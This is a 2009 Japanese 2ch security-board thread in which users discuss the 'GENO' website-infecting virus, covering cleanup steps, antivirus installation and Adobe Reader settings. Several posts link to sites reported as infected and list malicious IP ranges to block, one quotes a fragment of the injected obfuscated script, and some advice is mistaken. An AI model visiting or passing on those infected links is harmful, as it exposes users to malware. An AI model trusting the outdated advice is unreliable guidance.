どんな名前かとかわからないでしょうか。
296名無しさん@お腹いっぱい。:2009/05/16(土) 08:27:01
見積りとかはVIPでやれよ
ここはセキュリティ板
297名無しさん@お腹いっぱい。:2009/05/16(土) 08:27:02
GENOのURL貼るなw
心臓がどっきんこ言っただろw
298名無しさん@お腹いっぱい。:2009/05/16(土) 08:28:11
やっぱ、「GENOウイルス」って名称は
中古PCショップの「GENO」が発祥だから?
299名無しさん@お腹いっぱい。:2009/05/16(土) 08:28:25
>>294
ソフマップはまともな買取してないからハズレ率が高いよ
300名無しさん@お腹いっぱい。:2009/05/16(土) 08:29:32
>>298
YES
301名無しさん@お腹いっぱい。:2009/05/16(土) 08:30:01
>>299
でも、すぐに潰れるってことは無さそうだし、一応、アフターケアもしているじゃん
困った時に、電話で質問できるってのは大きいよ

ソフマップ以上に信用できる大手の中古PCショップってあるか?
302名無しさん@お腹いっぱい。:2009/05/16(土) 08:30:03
>>295
画面の右下のカスペアイコン右クリックでスキャンとか設定とか

カスペアイコンある? ちゃんとインストール出来てるのかな?
303名無しさん@お腹いっぱい。:2009/05/16(土) 08:30:17
>>293
これ見て、逆にAdobeのアップデータも入れていいのか混乱する人出そうだなw
304名無しさん@お腹いっぱい。:2009/05/16(土) 08:30:38
>>94
勉強になるなぁ
305名無しさん@お腹いっぱい。:2009/05/16(土) 08:31:02
>>298
GENOの対応があまりにもすばらしかったから、それに敬意を表して
GENOウイルスと呼ぶようになった
306名無しさん@お腹いっぱい。:2009/05/16(土) 08:31:55
>>295
あとエクスプローラでファイルやフォルダやドライブを右クリで
カスペマークのスキャン
307名無しさん@お腹いっぱい。:2009/05/16(土) 08:32:02
>>94
>本当に必要なファイルはVirusTotalにかけて、
>それ以外の99パーセントのファイルは、一応スキャンした後で、外付けHDDとかに退避がおすすめ。
>そしてしばらく凍結。
>今は完全に 悪意の攻撃者 >>>>>>>>>>>>>>>>>>>>>>>セキュリティーベンダー
>だから、1ヶ月(いや、最悪半年か?)くらい、不要ファイルは寝かせて、
>セキュリティーベンダーのウィルス特定精度があがってきた頃に、外付けHDDの中を再スキャン。
>その時は、マカフィー、ノートン、G-Data Kaspersky など複数ソフトで検索した方がいいよ。



勉強になるなぁ
308名無しさん@お腹いっぱい。:2009/05/16(土) 08:33:40
>>298
実際、どっかのセキュリティベンダーが、
その初代ウィルスをGENOなんとかって命名してる
309名無しさん@お腹いっぱい。:2009/05/16(土) 08:33:54
ところで、外付けHDDに全ファイルを対比させたとして、
後でUSBでクリーンインストール後のPCに接続した時に、
外付けHDDに潜んでいるウイルスがクリーンなPC本体に入り込む危険は無いの?
310名無しさん@お腹いっぱい。:2009/05/16(土) 08:35:06
>>309
危険は有る
311272:2009/05/16(土) 08:35:20
>>295
ごめん。
そういう意味じゃなくって、
setup.exeの親フォルダはkis8なんでしょ?
そのまた親フォルダか爺さんフォルダか、ひい爺さんフォルダに日本語を含んでない?
例えば、Dドライブ直下に半角英数でKIS8ってフォルダを作って、そこにKIS8の全ファイルを移動してWクリックで
セットアップが起動しないか試してみて。
312名無しさん@お腹いっぱい。:2009/05/16(土) 08:35:30
現状は知らないけど同人板はウイルスが原因で爆撃されて被害に遭ってたよな。
P2Pは関係なくてロダに上がってるファイルから感染してる場合が多いのも特徴だった。
313名無しさん@お腹いっぱい。:2009/05/16(土) 08:35:34
629 :GENO:2009/05/16(土) 07:04:38 ID:SvPTTP+Z0
GENO(ジェノ)ウイルス。
まさにGENOCIDE(集団虐殺)

誰がうまいこと言えと。まぁ俺なんですけどね。
314名無しさん@お腹いっぱい。:2009/05/16(土) 08:35:35
Virtual BoxにUbuntu入れて
それでネットやるか
315名無しさん@お腹いっぱい。:2009/05/16(土) 08:36:22
google charmは今のところ閲覧問題なし?
316名無しさん@お腹いっぱい。:2009/05/16(土) 08:37:12
>>284
開いちゃったんだが大丈夫だよな…?
317名無しさん@お腹いっぱい。:2009/05/16(土) 08:37:22
GENOのおかげで日本中に広まったんだから
敬意を表してGENOウイルスと呼んでやろうぜ
318名無しさん@お腹いっぱい。:2009/05/16(土) 08:37:45
ああカスペをインストールできてないみたいなのか
319名無しさん@お腹いっぱい。:2009/05/16(土) 08:37:46
同人板の連中なんてhtmlも使えない奴ばっかだろ
何言っても無駄
320名無しさん@お腹いっぱい。:2009/05/16(土) 08:37:53
>>302
デスクトップにはkis8って名前のフォルダとkis8.0.0.454.jptaって名前のアイコンがあります。
kis8.0.0.454.jptaのアイコンを右クリックすると開くは出るんですがスキャンは透明でクリックできません。
開いて実行を選択するとC:\Documents and Settings\as\デスクトップ\と出ます、
解凍をクリックすると既に同名のファイルが存在しますと出ます。

>>273さんが教えてくれたC:\Program Files\Kaspersky Labを入力して実行してみたら
インストールの画面が出たんですが、この画面は何度もでてインストールはしたはずなんですが、
やってみたほうがいいでしょうか。
321名無しさん@お腹いっぱい。:2009/05/16(土) 08:38:16
>>316
あなたの危機感がアウトー
322名無しさん@お腹いっぱい。:2009/05/16(土) 08:38:18
>>316
大丈夫ですよ^^

って言ってもらえば満足か?
323名無しさん@お腹いっぱい。:2009/05/16(土) 08:38:27
>>312
それもあるだろうけど
個人でサイト持ってる率が他より多いからじゃね?
FTPでうpする際に撒くと
324名無しさん@お腹いっぱい。:2009/05/16(土) 08:38:58
>>316
感染した可能性はありますん
325名無しさん@お腹いっぱい。:2009/05/16(土) 08:41:53
>>310
じゃあ、一旦、外付けHDDに内容を退避して
OS再インストール後のクリーンPCに戻すことは出来ないの?

USBで接続した瞬間にウイルスが入り込んでくる?
326名無しさん@お腹いっぱい。:2009/05/16(土) 08:42:02
>>320
>>272じゃないけど、フォルダのパスに「デスクトップ」っていう日本語が入ってるからアウトなんじゃない
つまりは、ドライブルートに入れて(つまりマイコンピュータ開いてCドライブ直下にフォルダを移動して)実行すればいけると思う
327名無しさん@お腹いっぱい。:2009/05/16(土) 08:42:27
>>320
同名のファイルが存在しますと出るのはもうすでにkis8フォルダがあるから
一度kis8フォルダを削除してkis8.0.0.454.jptaを>>311さんの言うとおり
D:\とかC:\に移動してからダブルクリックでインストールして
32894 101 154:2009/05/16(土) 08:44:17
>>313
ひそかにうまいと思っていた。

>>295
はカスペインストールできてないと思うんだよ。 
解凍しただけだから、setup.exeを起動してインストールさせようとしているんじゃないの?

そう思って>>311 を書いた。
>>320
インストールできていない。
プログラムの追加と削除で確認してみな。
インストールできていたら、セットアップ画面でポリシーと尋ねられるから、そこで迷うはず。
すでに通過したとは思えない。

>>316
トップしかみてないけど、トップは大丈夫くさい。
スクリプトはGeno関連のgoogleだけで、いつもと同じ。
329名無しさん@お腹いっぱい。:2009/05/16(土) 08:45:41
インストール終わったらkis8フォルダ入れないので削除ね
330名無しさん@お腹いっぱい。:2009/05/16(土) 08:46:28
訂正
インストール終わったらkis8フォルダ要らないので削除ね
331名無しさん@お腹いっぱい。:2009/05/16(土) 08:46:42
>>325
とりあえずなんのために時間を置くのか解っているのか
332名無しさん@お腹いっぱい。:2009/05/16(土) 08:48:32
>>284のサイトを開いたがVistaだから問題ないな
333名無しさん@お腹いっぱい。:2009/05/16(土) 08:49:16
Skypeとかメッセンジャーは感染元になったりすることはあるんでしょうか
334名無しさん@お腹いっぱい。:2009/05/16(土) 08:50:21
>>333
他のウイルスならある
335名無しさん@お腹いっぱい。:2009/05/16(土) 08:52:30
仕方ないから貯めた画像だけでチンコしごくか
ひさじぶりに見た画像が妙にエロくて右手が止まらないwwwwwwwwwwwwwwwwwwwwwwwwww
336名無しさん@お腹いっぱい。:2009/05/16(土) 08:53:10
>>334
回答有難うございます
337名無しさん@お腹いっぱい。:2009/05/16(土) 08:53:14
>>335
楽しそうだなwwwwwwww
338名無しさん@お腹いっぱい。:2009/05/16(土) 08:53:34
339名無しさん@お腹いっぱい。:2009/05/16(土) 08:53:45
同人板へお帰りください><;
340名無しさん@お腹いっぱい。:2009/05/16(土) 08:56:15
同人板でデフォルト名無しで書いてるのはこっちから流れてった人か?
デフォ名無しは各自あぼーん対象だぞあそこは
34194 101 154:2009/05/16(土) 08:56:21
>>325
時間おけば、セキュリティーソフトが対応してくるだろうけど、
USBの自動再生はきっておいた方がいい。

http://support.microsoft.com/kb/967715/ja
http://www.atmarkit.co.jp/fwin2k/win2ktips/1139autrun/autrun.html
http://blogs.technet.com/jpsecurity/archive/2009/02/25/3206334.aspx
MSがヘマやらかしてるから、情報が交錯していて結構面倒。

うるおぼえだけど、マイクロソフトがXPにおけるUSBの自動再生は無効にする予定だった気がする。
342名無しさん@お腹いっぱい。:2009/05/16(土) 08:57:38
>>335
うおい!なんかイカくせーぞw
343名無しさん@お腹いっぱい。:2009/05/16(土) 08:58:45
USBの自動再生なんぞ
Shell Hardware Detection
っていうサービスとめればすぐとまるだろ
344名無しさん@お腹いっぱい。:2009/05/16(土) 08:59:52
Vistaでも感染するんじゃない?

ieがアドビの更新頻繁に求めて来たぞ
345名無しさん@お腹いっぱい。:2009/05/16(土) 09:00:09
 他人の不幸で今日も飯がうまい!!
    +        ____    +
      +   /⌒  ⌒\ +
   キタ━━━//・\ ./・\\━━━━!!!!
    +   /::::::⌒(__人__)⌒:::::\  +
        |  ┬   トェェェイ     |
     +  \│   `ー'´     /    +
     _|\∧∧∧MMMM∧∧∧/|_
     >                  <
   /  ─ /  /_ ──┐ヽ|  |ヽ  ム ヒ | |
 \/  ─ / / ̄ /   /  | ̄| ̄ 月 ヒ | |
  ノ\ __ノ   _ノ   \   / | ノ \ ノ L_い o o
346名無しさん@お腹いっぱい。:2009/05/16(土) 09:00:21
>>344
感染する
347名無しさん@お腹いっぱい。:2009/05/16(土) 09:01:07
>>345
そう言いながら実はウイルス飼ってるんですよねw
348名無しさん@お腹いっぱい。:2009/05/16(土) 09:03:22
>>306
>>320
>>326
>>327
>>311
レス遅くてすみません。
Cドライブに移して実行したらインストール画面が出てきました。
インストールをクリックすると既に同じバージョンの製品がインストールされてます。上書きインストールを始めますかとでます。
続けても平気でしょうか?
349名無しさん@お腹いっぱい。:2009/05/16(土) 09:05:09
いまさらな質問で悪いんだが、同人サイトが感染ってことはその各管理人がロガーでパス抜かれてサイト編集されたってこと?
だとしたらキーロガーとしてもそうとう恐いウイルスって認識していいの?
流れに乗り遅れていまひとつよくわからん
350344:2009/05/16(土) 09:06:16
〉〉346

把握
351名無しさん@お腹いっぱい。:2009/05/16(土) 09:06:48
そういえばこの間、Adobe Readerのアップデートしやがれって連絡が何度もきてたっけ
これが原因か
352名無しさん@お腹いっぱい。:2009/05/16(土) 09:07:35
>>349
うpする時にファイルにコード書き込むんじゃないっけ?
353332:2009/05/16(土) 09:07:43
>>344
えっ!?
354名無しさん@お腹いっぱい。:2009/05/16(土) 09:09:01
何なのこの勢いw
355名無しさん@お腹いっぱい。:2009/05/16(土) 09:09:14
今ルーターの設定をやっているのだが、拒否するIPアドレスは94.247.0.0/16でOKですか?
356名無しさん@お腹いっぱい。:2009/05/16(土) 09:09:28
>>348
わけわからなくなってるようなのでプログラムの追加と削除で一度アンインストールして
初めからやり直すのがいいんじゃないかな
357名無しさん@お腹いっぱい。:2009/05/16(土) 09:09:56
>>349,352
両方だな感染したままだとうp時にうp先にも繁殖
PC側をクリーンにしてもPWがキーローガーで流れててれば改竄さえる危険が有る
358名無しさん@お腹いっぱい。:2009/05/16(土) 09:10:00
語尾にwを付けたがる奴は同一人物か?
同人板に帰れよ
359名無しさん@お腹いっぱい。:2009/05/16(土) 09:10:39
うほっ、今更ながらcmdとregedit立ち上げを試してみたがどっちも立ち上がった
MD5改変もない、Adobeのリーダーは削除したがフラッシュプレイヤーは10.22.87(?)と確か最新
感染したかもと恐怖したがどうやら大丈夫そうだな・・・
ただ同人サイトの巡回は当分無理だな、しょうがないとはいえ
360名無しさん@お腹いっぱい。:2009/05/16(土) 09:11:03
kis8フォルダも削除ね
361名無しさん@お腹いっぱい。:2009/05/16(土) 09:16:37
まあちゃん♪
362名無しさん@お腹いっぱい。:2009/05/16(土) 09:17:35
>>356
試しにインストールクリックしたら
「インストールのログファイルを開くときにエラーが発生しました。
指定されたログ、ファイルが存在し書き込み可能であるか確認してください」とでてしまいました。

アンインストールしてみます。
363名無しさん@お腹いっぱい。:2009/05/16(土) 09:17:50
そんなあなたにLinux
USBメモリからも起動できて同人サイトの巡回もウマウマ
364名無しさん@お腹いっぱい。:2009/05/16(土) 09:18:28
>>355
他にもあるみたい
365名無しさん@お腹いっぱい。:2009/05/16(土) 09:19:09
>>349
キーロガーじゃ無い事に注意
366名無しさん@お腹いっぱい。:2009/05/16(土) 09:21:47
>>355
厳密に94.247.[2-3].[0-255]だけを弾きたいなら、94.247.2.0/23でもいいんじゃない
俺はFWには94.247.0.0/16で登録してるけど
367名無しさん@お腹いっぱい。:2009/05/16(土) 09:22:13
>>341
USBで接続された外付けHDDの自動再生、つまり「プラグ・アンド・プレイ」のこと?

自動で中身を読み込まなければ、USB接続して外付けHDDの中身をavastとかでチェックかけて
何も出てこなければPC内部のHDDにコピーしてもOK?
368名無しさん@お腹いっぱい。:2009/05/16(土) 09:23:29
>>355
それはちょっと前のZlkonだね。
今は、94.229.65.160/27が必要。
369名無しさん@お腹いっぱい。:2009/05/16(土) 09:25:04
MS、Autorunを正しく無効化するための更新プログラムを公開
370名無しさん@お腹いっぱい。:2009/05/16(土) 09:25:08
>>1に載っているサイトさん(atword.jp/gnome)の最新記事、
矛盾しているように見えるのですが、もし感染していた場合、
サイトのクリーンアップとローカルのクリーンアップどちらを優先するべきですか?



以下のふたつの文章です
--------------------------------------------------------------
>附記的な注意になりますが、すべてのイメージファイルをバックアップから再アップロードしてください。
>※注意:先に全サイト内の全部のディレクトリからすべてのファイルを消す必要があります。

--------------------------------------------------------------
>絶対に感染したPCで感染したサイトのクリーンアップを行わないでください。
>貴方はまず先に、感染しているかもしれないローカルなPCのクリーンアップから開始しなければなりません。
371名無しさん@お腹いっぱい。:2009/05/16(土) 09:26:32
http://www29.atwiki.jp/geno/pages/14.html
94.247.2.195(94.247.[2-3].[0-255])への接続を遮断


この情報は古い
372名無しさん@お腹いっぱい。:2009/05/16(土) 09:26:57
>>370
まずは自分のPCをきれいにしてください。
373名無しさん@お腹いっぱい。:2009/05/16(土) 09:27:43
クリーンアップ (Clean up) とは野球に於いて、塁の上にいる走者を生還させることが期待される打順のことである。
374名無しさん@お腹いっぱい。:2009/05/16(土) 09:29:28
ここの>>2見てAdobe Readerってダメなのかと思ってAdobe Acrobat Readerググったら有料かよ
大人しくAdobe Readerでチェックボックス外すか
それにしても、カズペが落ち目だからノートン乗り換えようと思ったら、そのノートンがGENOには残念対応とか・・
375名無しさん@お腹いっぱい。:2009/05/16(土) 09:30:47
>>368
もう94.0.0.0/8とかでいいよww
376名無しさん@お腹いっぱい。:2009/05/16(土) 09:32:25
テンプレにこれ入ってないな

PeerGuardian 33
http://hideyoshi.2ch.net/test/read.cgi/download/1237676474/
377名無しさん@お腹いっぱい。:2009/05/16(土) 09:33:21
>>371
いまはどうなってんの?
378名無しさん@お腹いっぱい。:2009/05/16(土) 09:33:55
>>373
なるほど、だから「走者一掃の満塁ホームラン」などと言われるのか。
379名無しさん@お腹いっぱい。:2009/05/16(土) 09:34:00
もしサイトがもう感染してたらファイル消した方がいいんだよな?
380名無しさん@お腹いっぱい。:2009/05/16(土) 09:34:04
381名無しさん@お腹いっぱい。:2009/05/16(土) 09:35:52
ん?
Acrobat Readerの改名がAdobe Readerだよね?
382名無しさん@お腹いっぱい。:2009/05/16(土) 09:36:50
戒名な
383名無しさん@お腹いっぱい。:2009/05/16(土) 09:38:19
不安なやつは、再インストール。

これが鉄板。
384名無しさん@お腹いっぱい。:2009/05/16(土) 09:38:24
>>379
自分のPCを綺麗にする→サイトを綺麗にする の順。
出来れば自分のPCをきれいにした後FTP Password変更

汚染されたPCからサイトのファイルを操作してもいたちごっこ。
385名無しさん@お腹いっぱい。:2009/05/16(土) 09:38:44
>>284
吹いたwwwおっめーふざけんなお

noscriptさんとavastくんに警護されてるから屁でもないぜ
386名無しさん@お腹いっぱい。:2009/05/16(土) 09:42:01
>384
汚染されたPCからでも既にファイル改竄されてしまってるなら
全部消した方がいいんじゃないの?見た人感染するから
ファイル改竄がまだならアクセスしたらまずいんだろうけど
387名無しさん@お腹いっぱい。:2009/05/16(土) 09:44:33
まとめサイトがおかしいという話をきいたが
388名無しさん@お腹いっぱい。:2009/05/16(土) 09:44:50
>>380
40箇所以上もあるのか。
うちのルーターは最大で32箇所なのだがorz
389名無しさん@お腹いっぱい。:2009/05/16(土) 09:46:04
え、3時間前と変わってない気がする>まとめサイト

どこがおかしいのか指摘plz
390名無しさん@お腹いっぱい。:2009/05/16(土) 09:47:25
>>386

>>379は既にサイトが感染した場合を想定している。
早急に汚染を拡大させない*だけ*の目的なら、自身のWeb用htmlファイル全削除後に
サイトのファイル全消去。
だろうけれど、復旧にどれくらい時間がかかるかな。
391名無しさん@お腹いっぱい。:2009/05/16(土) 09:48:16
おとといまで保守気味に書き込んでたのに
ここ2日で一気に進行加速しててワロタ

やっと認知されてきたのに、対応法は進化してないのがガクガク(((( ;゚Д゚))))ブルブル
392名無しさん@お腹いっぱい。:2009/05/16(土) 09:48:35
>>387
同人サイト向けWiki
393名無しさん@お腹いっぱい。:2009/05/16(土) 09:48:37
>>388
そんなに無理ww
394名無しさん@お腹いっぱい。:2009/05/16(土) 09:48:48
カスペインストール失敗した者なんですけど、一度アンインストールしました。
もう一回インストールするときに気をつけたほうが良いこととかあったら助言お願いします。
395名無しさん@お腹いっぱい。:2009/05/16(土) 09:49:01
693 geno New! 2009/05/16(土) 09:34:37 ID:lv1QsSrS0
今急いでチェックしてきた。これは怖い
サイトの日記でも注意喚起して来た方がいいね

あと同人向けまとめWikiのGENOウィルスまとめへのリンクが
違うサイトになっててビビったから報告


694 GENO sage New! 2009/05/16(土) 09:37:15 ID:oOSNfhyI0
>>255の、まとめサイトへのリンクが変なんだが…
関係ないページに飛ばされる。ちなみに飛んだ先でnoscriptがjs4個ブロックした
396名無しさん@お腹いっぱい。:2009/05/16(土) 09:50:29
誰かに弄られたんだな
397名無しさん@お腹いっぱい。:2009/05/16(土) 09:50:51
Avira、対応したな
過信は禁物だが

Engine Update AV8/9 8.02.00.168 / AV7 7.09.00.168 (2009-05-15)
- Updated: PDF exploit detection
HTML/Shellcode.Gen
398名無しさん@お腹いっぱい。:2009/05/16(土) 09:52:07
>>397
有志が毎日報告してくれてるけど、その時点ではスルーも多いから
本当に油断禁物
399前スレ77:2009/05/16(土) 09:53:01
>>388
でも、まだ増え続けてるよ
400名無しさん@お腹いっぱい。:2009/05/16(土) 09:53:06
いや>379も>386も自分です

PCだけウィルス感染してる場合はすぐクリーンインスコ&パス変更で、
PCもサイトも感染済みの場合は、もうパス抜かれてるんだから
感染拡大防止に鯖のファイルまず全部消した方がいいんじゃないのかと思ったのです
401名無しさん@お腹いっぱい。:2009/05/16(土) 09:53:30
>>394
前回のインストール用のkis8フォルダが残ってないかチェック
402名無しさん@お腹いっぱい。:2009/05/16(土) 09:54:45
>>391
Vista機の購入で解決。
間違っても、安易にXPからVistaにアップしないこと。
403名無しさん@お腹いっぱい。:2009/05/16(土) 09:56:19
Vistaでも感染してる人がいるらしいじゃない?
404名無しさん@お腹いっぱい。:2009/05/16(土) 09:59:58
hXXp://www.zengozen.co.jp/
も感染確認
405名無しさん@お腹いっぱい。:2009/05/16(土) 10:00:03
システムドライブ以外のドライブのデータファイルも改竄されたりするの?
406名無しさん@お腹いっぱい。:2009/05/16(土) 10:01:53
>>401
ありがとうございます、消せました。
あと最初にカスペのサイト開いた時はまとめwikiのリンクから行ったんですが
wikiおかしくなってるんですよね。
検索かけたいんですがカスペって何て正式名称何だったでしょうか。
407名無しさん@お腹いっぱい。:2009/05/16(土) 10:04:23
>>404
GJ 踏んできま〜す
408名無しさん@お腹いっぱい。:2009/05/16(土) 10:04:39
>>406
カスペでぐぐればカスペルスキーがでてくるだろ。
どこまで教えてちゃんなんだよ・・・
409名無しさん@お腹いっぱい。:2009/05/16(土) 10:04:50
vista感染した奴は挙手!
uac切ってた?
410名無しさん@お腹いっぱい。:2009/05/16(土) 10:04:57
カスペルスキー
411名無しさん@お腹いっぱい。:2009/05/16(土) 10:06:45
>>406
Kaspersky (カスペルスキー)

ジャストシステムのとこでいいのかな?
ttp://www.just-kaspersky.jp/

一応カスペWiki
ttp://kaspe.2chv.net/wiki/index.php?FrontPage
412名無しさん@お腹いっぱい。:2009/05/16(土) 10:06:48
>>404
ヤバッ!埋め込まれている!
413名無しさん@お腹いっぱい。:2009/05/16(土) 10:08:35
>>404
>>31
あほ?
414名無しさん@お腹いっぱい。:2009/05/16(土) 10:09:15
なんだいw載ってたやつかw
415名無しさん@お腹いっぱい。:2009/05/16(土) 10:10:52
放置されてるな
416名無しさん@お腹いっぱい。:2009/05/16(土) 10:11:10
4月くらいに再起動できなくなるとか言ってたけど今どうなの?
regeditなんてそうそう使わないから気付かなそう
417名無しさん@お腹いっぱい。:2009/05/16(土) 10:11:11


切ってないけどIeがアドビの更新頻繁に求めて来た

因みにアバストで検査したけど出てこなかった

バックアップした外付け感染してんのかな…
418名無しさん@お腹いっぱい。:2009/05/16(土) 10:14:04
>>408
すみません、先に調べるべきでした。

>>410>>411
ありがとうございます。
419名無しさん@お腹いっぱい。:2009/05/16(土) 10:17:00
avastに乗り換えてスキャンやってるんだが
かなり時間かかるのなこれ
420名無しさん@お腹いっぱい。:2009/05/16(土) 10:19:17
ここで出てくるavastってフリー版のやつだよね? 有料版あるのかは知らないけど
avastって他のウイルスに対してはどうなのかな?
avastって良いんだろか? avastたんがいいのは分かるんだけど
421名無しさん@お腹いっぱい。:2009/05/16(土) 10:19:50
avastかAVGで昔迷って
AVGだったけど今回からavastになった
422名無しさん@お腹いっぱい。:2009/05/16(土) 10:19:51
もうブラウザにpdfを表示しないみたいなオプション付けろよ
423名無しさん@お腹いっぱい。:2009/05/16(土) 10:19:58
>>400
PCだけの感染だけならば多分そう。
ただサイトのも変更されていた場合は、アクセスし削除する前に
自身のPCのhtmlを削除し無いと消している間等で、本人が消したつもりでも
再度なにかが転送される恐れがある。
424名無しさん@お腹いっぱい。:2009/05/16(土) 10:22:49
流れ早いお
425名無しさん@お腹いっぱい。:2009/05/16(土) 10:22:53
カスペってKaspersky Internet Security 2009とKaspersky Anti-Virus 2009、
Kaspersky Anti-Virus for Windows Server 6.0 Home Server Editionのどれがいいんですか?
426名無しさん@お腹いっぱい。:2009/05/16(土) 10:23:29
>>63でも出てるけど、うちもcmd.exeで実行して
「dir C:\WINDOWS\system32\sqlsodbc.chm」で
エンター押したら「ファイルが見つかりません」って出る。
XPなんだが、ファイル一体どこにいるんだ……。
それともアウアウってこと?
427名無しさん@お腹いっぱい。:2009/05/16(土) 10:23:58
>>421
ありがとう
ここ2年くらいカスペ試用版で特にまだ感染とか無いんだけど気になって聞いてみました
428名無しさん@お腹いっぱい。:2009/05/16(土) 10:24:25
>>426
なんで普通にエクスプローラで見ようと思わないんだよ
429名無しさん@お腹いっぱい。:2009/05/16(土) 10:24:25
>>422
Fxならプラグインから無効化出来なかったっけ
てかお前らそもそもPDFなんて読むよむのかよ
AReaderごとアンインストール→smartpdfで良くね
430名無しさん@お腹いっぱい。:2009/05/16(土) 10:24:35
>423
なるほど解りました
ありがとう
431名無しさん@お腹いっぱい。:2009/05/16(土) 10:26:36
そういうときは地道に辿っていくしかないべや
Cドライブ→WINDOWS→system32
で、自分の目でsqlsodbcってファイルを探す
432名無しさん@お腹いっぱい。:2009/05/16(土) 10:27:16
>>428
ああありがとう!それでも見られたね!
感染を自己申告したサイトを見ててすげえてんぱってた。
50KBだったのでようやく安心できたよ、有難う!
433名無しさん@お腹いっぱい。:2009/05/16(土) 10:27:17
>>431>>426へのレス
434名無しさん@お腹いっぱい。:2009/05/16(土) 10:27:49
このウイルスって万全な対策法がないんだよね。
それじゃクリーンインストールしたところで再感染しそう。。
しかも感染か未感染かを確実に判別する方法がないから、いつまでたっても疑心暗鬼。
めんどくさい。。
435名無しさん@お腹いっぱい。:2009/05/16(土) 10:28:03
436名無しさん@お腹いっぱい。:2009/05/16(土) 10:28:15
>>422
PDFをブラウザに表示ってAdobe Reader側にある
437名無しさん@お腹いっぱい。:2009/05/16(土) 10:29:27
>>426です

>>431さんもありがとう。
てんぱりの余韻で変に安価だけ投稿してしまった。
それでは七誌に戻ります。
438名無しさん@お腹いっぱい。:2009/05/16(土) 10:29:36
>>425
普通のPCならKaspersky Internet Security 2009
439名無しさん@お腹いっぱい。:2009/05/16(土) 10:31:23
>>426
同人版のまとめwikiは何かが全角だとかでそのままコピペはダメらしい
同人版のスレ内にコピペが貼ってあるからそれコピペすれば普通にでてきた
440名無しさん@お腹いっぱい。:2009/05/16(土) 10:32:46
今回ばかりは対策しないとだめだと思って
昨日の夜からはじめたらもう朝だぜ・・・
441名無しさん@お腹いっぱい。:2009/05/16(土) 10:32:50
今回のやつとは関係ないけど

うちのavastが反応するんですが、なにこれ
りぶメールってところのサイト
ttp://www.livmail.com/3others-page/janet/tokusen/index.htm
442名無しさん@お腹いっぱい。:2009/05/16(土) 10:33:43
>>438
ありがとうございます!
443名無しさん@お腹いっぱい。:2009/05/16(土) 10:34:32
ってかリブメールのトップで反応あり
444名無しさん@お腹いっぱい。:2009/05/16(土) 10:34:54
>>441
ばっちり関係あります
445名無しさん@お腹いっぱい。:2009/05/16(土) 10:35:15
h抜きでも飛べるから工夫して貼れっつーの
446名無しさん@お腹いっぱい。:2009/05/16(土) 10:35:20
>>439
\ が全角だから
447名無しさん@お腹いっぱい。:2009/05/16(土) 10:36:28
regeditはファイル名の先頭がregedの場合動作できないみたいだから
c:\windows\regedit.exeをデスクットップにでもコピーして名前変えて実行すると普通に起動できた
448名無しさん@お腹いっぱい。:2009/05/16(土) 10:36:53
441はあぼーん依頼すべきだな
449名無しさん@お腹いっぱい。:2009/05/16(土) 10:37:09
工夫して貼ってないとわざとやってると思われるよ
あちらこちらにわざとやってんのいるから
450名無しさん@お腹いっぱい。:2009/05/16(土) 10:37:40
>>444
今回のウイルスですか?

>>445
すまそ
451名無しさん@お腹いっぱい。:2009/05/16(土) 10:37:48
これってCドライブのファイルしか書き換えないんなら外付けHDD買ったときに付いてきたHD革命でCドライブのバックアップイメージ作っといて
もし感染したらイメージ復元で戻せばとりあえず感染前には戻せるんだよね?
フラッシュとアクロバットリーダーは最新にしたけどPCに最初から入ってたバスターではダメっぽいしもうマジで怖いよorz
452名無しさん@お腹いっぱい。:2009/05/16(土) 10:39:16
ちなみに 441 は

ドリームメールの 【P貯め〜る】ってメールから
リンクされています。
アクセスすると2ポイント

なんです。
453名無しさん@お腹いっぱい。:2009/05/16(土) 10:39:25
>>451
つシステムの復元
454名無しさん@お腹いっぱい。:2009/05/16(土) 10:39:35
バスターでは他のウイルスでも駄目なの多いからな
455名無しさん@お腹いっぱい。:2009/05/16(土) 10:39:54
相変わらずaguseは反応しない。
456名無しさん@お腹いっぱい。:2009/05/16(土) 10:39:59
>>441
ソースに
(function(){var UkRR='%';var WdBp=('v&61r&20a以下略
と入って居ますね
457名無しさん@お腹いっぱい。:2009/05/16(土) 10:40:14
>>441
責任もって削除以来してこい
458名無しさん@お腹いっぱい。:2009/05/16(土) 10:40:28
Adobe Reader→環境設定→インターネット→PDFをブラウザに表示

PDFをブラウザに表示のチェックも外したほうがいいんじゃない?
459名無しさん@お腹いっぱい。:2009/05/16(土) 10:40:57
メールからは感染しないんだよな?
460名無しさん@お腹いっぱい。:2009/05/16(土) 10:41:44
HTMLメールに仕込めばいくらでも逝けるんじゃね?
461名無しさん@お腹いっぱい。:2009/05/16(土) 10:42:00
>>458
だいぶ前からはずすように言われてるよ
462名無しさん@お腹いっぱい。:2009/05/16(土) 10:46:45
よし、俺がとりあえず>>441にアクセスしてみる
仮想PCだし。画面キャプできたらどっかにうpしようかな
463名無しさん@お腹いっぱい。:2009/05/16(土) 10:47:10
>>461
読み直したら・・・
Adobe Reader→環境設定→JavaScript→Acrobat javascriptを使用
を切るしか書いてなかった気がしたから( ̄▽ ̄;)
464名無しさん@お腹いっぱい。:2009/05/16(土) 10:49:56
テンプレに反映出来てないんだろうな
465名無しさん@お腹いっぱい。:2009/05/16(土) 10:50:11
>>463
もしかしたら前スレかもしれないけど両方はずとくといいって
466名無しさん@お腹いっぱい。:2009/05/16(土) 10:51:51
>>462
ソースに情報が書き込まれてるって>>456でかいたんだが?
467名無しさん@お腹いっぱい。:2009/05/16(土) 10:52:24
ほんとだこのスレには>>436しかないね
468名無しさん@お腹いっぱい。:2009/05/16(土) 10:53:24
>>441
うぁぁぁぁぁぁ
469名無しさん@お腹いっぱい。:2009/05/16(土) 10:53:43
>>466
いや、ただ試しに踏んでみたいだけ。
470名無しさん@お腹いっぱい。:2009/05/16(土) 10:54:12
>>441
踏んじまっただろ!!責任取れ!!
471463:2009/05/16(土) 10:54:37
一応、自分もこのウィルスの危機にあいかけたので
気づいたところは書きたいと思います
472名無しさん@お腹いっぱい。:2009/05/16(土) 10:54:50
47394 101 154:2009/05/16(土) 10:55:04
>>422
Firefox側にもIE側にもついてるよ。

ところで、例のサイトでブラックリストが更新されたみたい。
あくまで、身内の為のリストらしい(多分、あまり騒ぎ立てて欲しくないっぽい)
感染を全て確認したわけではないし、全ては自己責任の範囲で らしいが。
俺は今から登録する。


KIS8で質問している人は、デフォルトのまま次々進めてOK
モデム切った状態で、PCを再起動させて、ネットにつないだら、直ぐにパターンファイルを更新。
更新されたら、ネットから切断して、完全スキャンを高設定にして、完全スキャン。
474名無しさん@お腹いっぱい。:2009/05/16(土) 10:55:35
>>471
えらい!
475名無しさん@お腹いっぱい。:2009/05/16(土) 11:00:47
